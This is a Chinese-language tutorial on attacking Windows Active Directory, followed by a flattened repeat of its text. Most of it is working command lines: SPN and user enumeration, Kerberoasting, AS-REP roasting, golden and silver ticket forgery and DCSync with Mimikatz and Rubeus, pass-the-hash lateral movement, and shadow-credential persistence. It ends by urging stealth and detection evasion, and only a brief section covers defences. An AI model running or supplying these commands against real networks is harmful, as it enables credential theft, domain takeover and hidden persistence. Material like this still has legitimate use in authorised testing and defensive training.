内网活动目录利用方法

字数 1010 2025-08-20 18:18:40

内网活动目录利用方法详解

一、活动目录基础概念

活动目录（Active Directory，AD）是微软提供的目录服务，用于集中管理网络资源，包括用户、计算机、组策略等。

核心组件

域控制器（DC）：运行AD服务的服务器
域（Domain）：安全边界和管理单元
森林（Forest）：一个或多个域的集合
组织单位（OU）：用于组织和管理AD对象
组策略（GPO）：集中配置管理工具

二、信息收集技术

1. 基础信息收集

# 获取当前域信息
net view /domain
net config workstation

# 获取域控制器
nltest /dclist:<domain>

2. 使用PowerShell收集

# 获取域信息
Get-ADDomain

# 获取域控制器
Get-ADDomainController

# 枚举域用户
Get-ADUser -Filter * -Properties *

# 枚举域计算机
Get-ADComputer -Filter * -Properties *

3. 使用BloodHound工具

BloodHound是AD环境可视化分析工具，可展示攻击路径。

三、常见攻击方法

1. Kerberoasting攻击

利用服务账户的SPN获取TGS票据进行离线破解。

攻击步骤：

枚举SPN

setspn -T <domain> -Q */*

请求TGS票据

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SPN"

导出票据

Invoke-Mimikatz -Command '"kerberos::list /export"'

2. AS-REP Roasting攻击

针对不需要预认证的账户。

攻击步骤：

Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt

3. 黄金票据攻击

利用krbtgt账户的NTLM哈希伪造TGT。

**攻击步骤：

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<domain> /sid:<domain-sid> /krbtgt:<krbtgt-hash> /ptt"'

4. 白银票据攻击

伪造特定服务的TGS票据。

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<domain> /sid:<domain-sid> /target:<target-server> /service:<service> /rc4:<service-account-hash> /ptt"'

5. DCSync攻击

模拟域控制器同步账户密码哈希。

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\<username>"'

四、权限提升方法

1. 滥用ACL权限

检查用户对高权限对象的修改权限：

Find-InterestingDomainAcl | ? {$_.IdentityReferenceName -match "<username>"}

2. 滥用组策略

查找有修改权限的GPO

Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -match "<username>"}

修改GPO添加后门

3. 滥用委派权限

查找非约束委派主机

Get-DomainComputer -Unconstrained | select name

查找约束委派

Get-DomainComputer -TrustedToAuth | select name

五、横向移动技术

1. Pass-the-Hash

Invoke-WMIExec -Target <target> -Domain <domain> -Username <user> -Hash <hash> -Command "cmd /c <command>"

2. Overpass-the-Hash

Invoke-Mimikatz -Command '"sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:powershell.exe"'

3. 远程服务执行

Invoke-PSExec -ComputerName <target> -Command "cmd /c <command>" -Username <user> -Password <password>

六、持久化技术

1. 黄金票据

(见上文黄金票据攻击)

2. 影子凭证

Whisker.exe add /target:<computer> /domain:<domain> /dc:<dc> /path:cert.pfx /password:Passw0rd!

3. DSRM密码同步

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

七、防御检测方法

1. 监控异常行为

异常Kerberos票据请求
异常DCSync操作
异常ACL修改

2. 加固建议

禁用不必要的预认证
限制委派权限
定期轮换krbtgt账户密码
启用LSA保护
监控敏感账户活动

八、工具推荐

BloodHound - AD环境可视化分析
Impacket - 网络协议攻击套件
Mimikatz - 凭据提取工具
Rubeus - Kerberos攻击工具
PowerView - AD信息收集工具

总结

内网活动目录渗透是一个系统性的过程，需要结合信息收集、权限提升、横向移动和持久化等技术。理解AD的工作原理和安全机制是成功渗透的关键，同时也要注意操作隐蔽性和规避检测。

内网活动目录利用方法详解一、活动目录基础概念活动目录（Active Directory，AD）是微软提供的目录服务，用于集中管理网络资源，包括用户、计算机、组策略等。核心组件域控制器（DC）：运行AD服务的服务器域（Domain）：安全边界和管理单元森林（Forest）：一个或多个域的集合组织单位（OU）：用于组织和管理AD对象组策略（GPO）：集中配置管理工具二、信息收集技术 1. 基础信息收集 2. 使用PowerShell收集 3. 使用BloodHound工具 BloodHound是AD环境可视化分析工具，可展示攻击路径。三、常见攻击方法 1. Kerberoasting攻击利用服务账户的SPN获取TGS票据进行离线破解。攻击步骤：枚举SPN 请求TGS票据导出票据 2. AS-REP Roasting攻击针对不需要预认证的账户。攻击步骤： 3. 黄金票据攻击利用krbtgt账户的NTLM哈希伪造TGT。 ** 攻击步骤： 4. 白银票据攻击伪造特定服务的TGS票据。 5. DCSync攻击模拟域控制器同步账户密码哈希。四、权限提升方法 1. 滥用ACL权限检查用户对高权限对象的修改权限： 2. 滥用组策略查找有修改权限的GPO 修改GPO添加后门 3. 滥用委派权限查找非约束委派主机查找约束委派五、横向移动技术 1. Pass-the-Hash 2. Overpass-the-Hash 3. 远程服务执行六、持久化技术 1. 黄金票据 (见上文黄金票据攻击) 2. 影子凭证 3. DSRM密码同步七、防御检测方法 1. 监控异常行为异常Kerberos票据请求异常DCSync操作异常ACL修改 2. 加固建议禁用不必要的预认证限制委派权限定期轮换krbtgt账户密码启用LSA保护监控敏感账户活动八、工具推荐 BloodHound - AD环境可视化分析 Impacket - 网络协议攻击套件 Mimikatz - 凭据提取工具 Rubeus - Kerberos攻击工具 PowerView - AD信息收集工具总结内网活动目录渗透是一个系统性的过程，需要结合信息收集、权限提升、横向移动和持久化等技术。理解AD的工作原理和安全机制是成功渗透的关键，同时也要注意操作隐蔽性和规避检测。